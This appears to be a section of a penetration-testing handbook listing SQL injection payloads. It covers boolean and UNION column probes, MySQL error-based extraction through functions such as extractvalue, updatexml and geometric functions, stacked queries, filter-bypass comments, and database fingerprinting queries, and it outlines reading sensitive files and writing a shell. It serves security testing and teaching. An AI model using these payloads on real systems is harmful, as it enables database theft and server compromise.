4.1.2. Injection Detection

4.1.2.1. Common injection points

  • GET/POST/PUT/DELETE parameters

  • X-Forwarded-For

  • file name

4.1.2.2. Fuzz injection point

  • ' / "

  • 1/1

  • 1/0

  • and 1=1

  • " and "1"="1

  • and 1=2

  • or 1=1

  • or 1=

  • ' and '1'='1

  • + - ^ * % /

  • << >> || | & &&

  • ~

  • !

  • @

  • backticks execute

4.1.2.3. Test constants

  • @@version

  • @@servername

  • @@language

  • @@spid

4.1.2.4. Number of test columns

For example http://www.foo.com/index.asp?id=12+union+select+null,null--,keep increasing null untill not return

4.1.2.5. Error injection

  • select 1/0

  • select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a

  • extractvalue(1, concat(0x5c,(select user())))

  • updatexml(0x3a,concat(1,(select user())),1)

  • exp(~(SELECT * from(select user())a))

  • ST_LatFromGeoHash((select * from(select * from(select user())a)b))

  • GTID_SUBSET(version(), 1)

4.1.2.5.1. Geometric-based error injection

  • GeometryCollection((select * from (select * from(select user())a)b))

  • polygon((select * from(select * from(select user())a)b))

  • multipoint((select * from(select * from(select user())a)b))

  • multilinestring((select * from(select * from(select user())a)b))

  • LINESTRING((select * from(select * from(select user())a)b))

  • multipolygon((select * from(select * from(select user())a)b))

It should be noted that the error injection based on the exp function is no longer effective in versions after MySQL 5.5.49. For details, please refer to this commit 95825f

The geometric-based error injection in the above list is fixed in this commit 5caea4 and it will no longer take effect in later versions of 5.5.x.

4.1.2.6. Stacked Injection

  • ;select 1

4.1.2.7. Comments

  • #

  • --+

  • /*xxx*/

  • /*!xxx*/

  • /*!50000xxx*/

4.1.2.8. Judging filter rules

  • Is there a trunc

  • whether to filter a character

  • Whether to filter keywords

  • slash and encoding

4.1.2.9. Obtaining information

  • Determine database type

    • and exists (select * from msysobjects ) > 0 access database

    • and exists (select * from sysobjects ) > 0 SQLServer database

  • Judgment database table

    • and exsits (select * from admin)

  • version, hostname, username, library name

  • Tables and Fields
    • Determine the number of fields

      • Order By

      • Select Into

    • table name, column name

4.1.2.10. Test permissions

  • file operations

    • read sensitive files

    • write shell

  • out-of-band channel

    • network request